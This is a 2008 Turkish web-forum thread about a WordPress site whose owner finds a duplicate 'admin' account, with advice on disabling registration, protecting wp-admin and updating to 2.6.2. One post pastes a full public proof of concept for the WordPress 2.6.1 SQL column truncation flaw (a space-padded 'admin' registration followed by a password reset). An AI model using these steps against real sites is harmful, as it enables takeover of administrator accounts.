R10.net

R10.net (https://www.r10.net/index.php)
-   WordPress (https://www.r10.net/wordpress/)
-   -   hacked! admin kullanıcısı 2 tane oldu (https://www.r10.net/wordpress/229399-hacked-admin-kullanicisi-2-tane-oldu.html)

teknotek 08-09-2008 23:00:42

hacked! admin kullanıcısı 2 tane oldu
 
Arkadaşlar kendini birşey sanan arkadaş:) gelmiş admin kullanıcı ismiyle üye olmuş. Aynı kullanıcı ismi ile 2 kişi görünüyor ve giriş yapamıyordum. Sildim şifre değiştirdim. Ne önerirsiniz?

Must4f4 08-09-2008 23:02:07

Tüm dosyaların CHMOD ayarlarını 664 yap

Priapos 08-09-2008 23:03:37

bana da yaptı bir kere denio nun biri :)

birde üşenmemiş tüm postları editleyip hacked by denio yazmış :D

teknotek 08-09-2008 23:04:10

644:o daha da mı düşüreyim

şu an üyeliği kapattım peşinden:) ama okul sitesi millet üyelik nerde diye bağırıyor

Must4f4 08-09-2008 23:04:37

Alıntı:

Priapos Nickli Üyeden Alıntı (Mesaj 2449458)
bana da yaptı bir kere denio nun biri :)
birde üşenmemiş tüm postları editleyip hacked by denio yazmış :D

Benim Beşiktaş ile ilgili açtığım siteye Bursasporlular aynısını yapmıştı :D

teknotek 08-09-2008 23:07:06

siz nasıl çözdünüz

sosyopat 08-09-2008 23:17:39

nasıl ya? ben şimdi anlamadım. birisi gelip wp sitemize "admin" kullanıcı adıyla kayıt olunca direk admin (yönetici) mi oluyor yani??

Nusret 08-09-2008 23:34:40

ewet aynen öyle adam register üye olurken
exploiti bu


# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                      x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]

samett1 08-09-2008 23:39:45

yani "admin" nicki hemen biz yapalimki böyle olay basimiza gelmesin öylemi? veya baska bisey yapabilirmiyiz ?

infratime 09-09-2008 00:24:25

çok acayip birşey ya :( hemen yeni bi' sürüm lazım wp'ye :(

Alexis 09-09-2008 00:39:45

2.6.1 diyor, resmen skandal bu...

we have duplicated 'admin' account in database

infratime 09-09-2008 00:41:36

Alıntı:

Alexis Nickli Üyeden Alıntı (Mesaj 2449860)
2.6.1 diyor, resmen skandal bu...

we have duplicated 'admin' account in database

evet ya çok acayip, diğer sürümlerde yokken en son sürümde olması biraz acayip oldu.

Ugursuz 09-09-2008 00:57:17

Siteyi üyeliğe kapatsak çözüm olur herhalde

ozgurland 09-09-2008 04:51:47

coder by hayalet mesajı editleyip sil istersen o mesajı resmen sitelerin hacklenmesine davetiye cıkarıyorsun
kendi sitemde denedim o verdiğin şeyleride çalışıyor maalesef.

wordpress sesimizi mi duydu nedir WordPress 2.6.2 mevcut! Lütfen şimdi güncelleyin.

baba18 09-09-2008 07:20:15

Helal olsun bunu bulana ve wordpress e.Onca kisinin emegi bi anda yok olabilir belkide olcak.Nası beceriyolar bunu anlamakta zorluk cekiyoruz..boyle bi hata olabilirmi..r10 ayrıca farkını gösterdi suan ilk burası yayımladı..yeni sürümü...

froNau 09-09-2008 07:58:51

Aynı şeyi demin birisi bana da yapmaya çalıştı. %100 R10'dan ve %100 bu konuyu okuyanlardan birisi. Ancak unuttuğu birşey var ki o da benim bu tür "ucuz" numaraları yemeyeceğim ;).

IP adresi bende saklı ******'ya PM göndereceğim bakalım kimmiş bulabilecek miyiz :).

Nusret 09-09-2008 08:25:13

şu anda çözümü üye olmayı kaldırın yakında patch çıkar bulursam size yazarım

froNau 09-09-2008 08:33:05

Alıntı:

Coder By HayaLeT Nickli Üyeden Alıntı (Mesaj 2450558)
şu anda çözümü üye olmayı kaldırın yakında patch çıkar bulursam size yazarım

2.6.2 zaten çıkmış durumda :).

Şu anlık geçici çözüm üyeliği kapatmak.

Yeni Kullanıcının Varsayılan Konumu: Üye olarak belirleyin. Ayrıca Kullanıcılar sayfasından da kontrol edin ben Allah'tan az önce fark ettim de sildim hemen. Bu ******** kim ise bulup banlatacağım şayet ****** yardım ederse.

Bir diğer çözüm yolu ise wp-admin klasörünüze hosting hesabınızdan şifre sağlamak. Umarım kimsenin canı yanmaz zira çoğu kişi farkında değil :(.

UfuX 09-09-2008 08:36:14

Güncelleyin EN İyisi :) Wp 2.6.2
https://www.r10.net/wordpress/229508-...s-2-6-2-a.html

kassarulu 09-09-2008 09:12:34

neyse güncelledim gitti
bu kadar saçma bir açık bıraktığı için WP yi kutluyorum

bowfinger 09-09-2008 09:55:07

gerçekten wordpress e yuh dedim bu eski dandik sistemlerde olan bir açık nasıl wordpressde oluşmuş anlam veremiyorum. Hadi yine iyiyiz r10 da duyuldu . Bunun amele lamer forumlarında duyulduğunu düşünsenize gerçi buradan okuyan biri umarım yazmaz , moderatorlerden ricam arkadaşın mesajını editlemeniz.

LANCE 09-09-2008 11:35:52

ben hala 2.3.1 sürümünü kullanıyorum :D Eski ama sorunsuz yenisindede pek farkı yok

Geveze1 09-09-2008 12:17:44

en iyisini yapıyorsun LANCE, yeni sürümlerde eklentiler çalışmıyor bile..

Must4f4 09-09-2008 12:21:34

Alıntı:

LANCE Nickli Üyeden Alıntı (Mesaj 2450915)
ben hala 2.3.1 sürümünü kullanıyorum :D Eski ama sorunsuz yenisindede pek farkı yok

Sadece admin panel :)

LANCE 09-09-2008 12:49:39

ben 2.3 ile 2.5 arasındaki farkı aynı şeye benzetiyorum

XP ile Vista arasındaki farka :D

LANCE 09-09-2008 12:53:26

Buyrun arkadaşlar sizin için WordPress 2.3.1 Türkçe sürümünü Uploadladım açıksız güvenilir hızlı doya doya kullanın :D

RapidShare: Easy Filehosting

Elestirmen 09-09-2008 14:01:20

2.3.1'in güvenli olduğunu nereden çıkardınız? Ciddi bir sql injection açığı var 2.3.1'de. Google'dan aratarak bulabilirsiniz.

Yuceltoluyag 09-09-2008 15:42:58

2.6.2 güvenli mi şimdi :D

fatihbaz 12-09-2008 05:45:12

ben de 2.5.1 de takılı kaldım :D

Rigobert 12-09-2008 05:51:04

senin nickin "admin" adamda alıyor ve senin yetkine sahip lur sen k.adını dğeiştirirsen ne olur peki*

teknotek 12-09-2008 22:23:10

acemice bir açık olmuştu, neyse çözüldü. Ama daha büyük sorunlar var, mesela 24 saatte kategorilerin kaybolması..

zege 13-09-2008 02:31:26

Şu ana kadar en saglam surum WordPress 2.3.3 dür.
bakınız: milw0rm.com


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 16:14:10.

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.